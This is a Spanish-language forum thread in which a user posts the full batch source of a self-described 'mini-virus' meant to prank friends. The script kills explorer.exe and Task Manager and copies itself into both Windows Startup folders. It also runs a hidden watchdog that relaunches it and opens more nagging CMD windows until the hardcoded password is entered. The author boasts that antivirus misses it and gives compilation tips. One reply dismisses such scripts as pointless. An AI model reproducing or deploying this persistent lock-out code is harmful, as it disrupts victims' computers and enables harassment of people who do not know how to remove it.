|
Título: ¿MiniVirus? en Batch Publicado por: Tino en 8 Marzo 2019, 02:14 am Hola foro! PRIMERO QUE NADA, quiero decir que esto no es como los típicos batch que eliminan la System32 y listo, porque primero, eso lo detecta hasta el antivirus más malo, y esto al ser algo ¿nuevo? no lo detecta. Y tampoco es un tipo de esas bromas con MSGBox, esto es algo que si se pudiera trabajar más en un lenguaje más avanzado (ya que se que en batch no se pueden hacer muchas cosas) podría llegar a ser algo muy poderoso.El script lo podes encontrar en mi GitHub (https://github.com/developingrxn/mcregedits) y acá abajo voy a dejar el SRC también. De paso, si quieren cambiarle el nombre al archivo, necesitan hacer varias cosas. Una de ellas es primero que nada cambiar todo lo que diga "MCRegedits.exe" a "NombreDeTuArchivo.exe", ya que no es algo automatizado (aunque si quieren puedo crear otro batch para automatizar esto.) Además tienen que pasar su archivo a .EXE mediante Bat2Exe (http://bat2exe.net/) (creo que es la mejor opción) De paso, al convertirlo a Bat2Exe (obligatorio, si no no funciona "CIF") hay algunos problemas, pero no importa. Paso a explicar mi script. El script lo que hace es: Al iniciarlo primero que nada cierra explorer.exe y taskmgr.exe para que no se pueda abrir casi nada, crea los archivos: CIF y MOLESTO con nombres random Código: SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM% Luego empieza a pedirles que inicien sesión con una contraseña de lo contrario no van a poder cerrar el programa.Si lo cierran, esta "CIF" que checkea todo el tiempo si MCRegedits.exe está abierto y si no lo está, lo abre. Crea cada 4 pings al localhost otra ventana CMD la cual empieza a molestar diciendo que inicie sesión, así que si está jugando a un juego en fullscreen etc, lo va a sacar, etc... Si escriben la contraseña incorrecta, empiezan a abrirse más screens CMD de "MOLESTO". Y lo más importante y es en lo que me centré es que si la persona que lo abre no entiende mucho o no tiene ni idea donde se puede esconder el programa etc, no lo va a poder eliminar. La única forma es entrando en modo seguro y eliminando MCRegedits.exe en "shell:startup" y "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" o usando un script que también cree por las dudas de que sin querer como una persona que le faltan varios jugadores lo abra (mi caso) cree un "antidoto" que elimina la mayoría de los archivos y deja la computadora utilizable. Si no me falta alguna otra cosa de poca importancia, ahí esta lo que hace un simple batch, sin eliminar nada, molestar. Si van a compartirlo por favor, dejen créditos con un simple link a mi perfil o una mención, me haría feliz ya que esta ***** me saco tiempo de mi vida en lo cual podría haber gastado haciendo algo más importante, jeje. De paso, para algunos que digan que se puede encontrar en otros lados y que me copio de alguien o que si hay metodos de resolución en Google etc... Chupenme bien la pija esto está hecho todo a mano sin ningún programa (excepto Bat2Exe) y lo único que saqué de Google ya que no me acordaba fue esto: Código: tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao la saque de Stackoverflow donde los gringuitos comparten su info.FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end Código: echo off cls :: EMPIEZA LA MAGIA (SCRIPTS PARA PERSISTENCIA) SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM% echo off cls echo :s >> %temp%\mss.bat >> %molestorndm%.bat echo echo echo off >> %temp%\mss.bat >> %molestorndm%.bat echo echo cls >> %temp%\mss.bat echo echo echo INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat echo echo title INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat echo echo ping localhost -n 2 >nul >> %temp%\mss.bat >> %molestorndm%.bat echo echo exit >> %temp%\mss.bat >> %molestorndm%.bat echo start %temp%\mss.bat >> %molestorndm%.bat echo ping localhost -n 4 >nul >> %molestorndm%.bat echo goto s >> %molestorndm%.bat start /min %temp%\%molestorndm%.bat :::::::::::::::::::::::::::::::: :: PERSISTANCE AFTER SHUTDOWN :: :::::::::::::::::::::::::::::::: copy MCRegedits.exe %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup copy MCRegedits.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup ::::::::: :: CIF :: ::::::::: copy MCRegedits.exe %temp% SET cifrandom=%random%MadeByTino%random%FF%random%FRV%random%ERVWZ%random%TYN%random%456VVV%random%ZZZEZ%random%VKJVEJJV%random%LDKIADI%random%DJDHE4H%random%3458347%random%73626%random%7235452%random%U345FCNC3%random%757HC32V23JVJ%random%U43VH23%random% echo :cif >> %temp%\%cifrandom%.bat echo taskkill /f /im "explorer.exe" >> %temp%\%cifrandom%.bat echo taskkill /f /im "taskmgr.exe" >> %temp%\%cifrandom%.bat echo echo off >> %temp%\%cifrandom%.bat echo tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao >> %temp%\%cifrandom%.bat echo FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end >> %temp%\%cifrandom%.bat echo start MCRegedits.exe >> %temp%\%cifrandom%.bat echo goto cif >> %temp%\%cifrandom%.bat echo :end >> %temp%\%cifrandom%.bat echo del mcregedits.lmao >> %temp%\%cifrandom%.bat echo goto cif >> %temp%\%cifrandom%.bat start /min %temp%\%cifrandom%.bat :start start /min %temp%\%cifrandom%.bat start /min %temp%\%molestorndm%.bat cls color f0 echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^= echo Al parecer necesitas iniciar sesi¢n echo Usa la contrase¤a que te han dado. echo. echo Si reinicias la PC o cierras el programa echo va a aparecer de nuevo echo Script made by Tino echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^= SET /P psw=Ingresa la contrase¤a: IF %psw%==tino777 goto :done ) ELSE ( goto :nope :done cls echo Contrase¤a correcta! echo Felicidades. cd %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup del MCRegedits.exe cd %temp% del MCRegedits.exe cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup del MCRegedits.exe taskkill /f /im "cmd.exe" taskkill /f /im "MCRegedits.exe" pause exit :nope cls echo Contrase¤a incorrecta! echo Intentalo de nuevo echo Mientras mas contrase¤as incorrectas, mas mensajes! echo. echo Presione cualquier tecla para volver al inicio pause >nul start %temp%\%molestorndm%.bat goto :start pause Título: Re: ¿MiniVirus? en Batch Publicado por: Eleкtro en 8 Marzo 2019, 06:48 am esta ***** me saco tiempo de mi vida en lo cual podría haber gastado haciendo algo más importante, jeje. Tu mismo lo has dicho... pudiendo hacer algo más importante vas y haces esta cosa. Sobre este tipo de scripts opino lo mismo que con respecto a los "antivirus batch", no son de utilidad. Y para no ser hipócrita confesaré que yo también hice algo relacionado en el año 2012...
pero, una vez aprendida la lección, ni loco volvería a perder mi tiempo haciendo algo de eso en Batch. PD: gracias por compartir. Saludos! Título: Re: ¿MiniVirus? en Batch Publicado por: Tino en 8 Marzo 2019, 18:04 pm Jajaja, es una pérdida de tiempo, pero lo hice para joder a amigos que no entienden nada y no olvidarme de Batch que aunque sea malo, siempre está piola saber otro lenguaje :)
Lo publico acá por si alguien quiere perder el tiempo con algo de ese estilo. |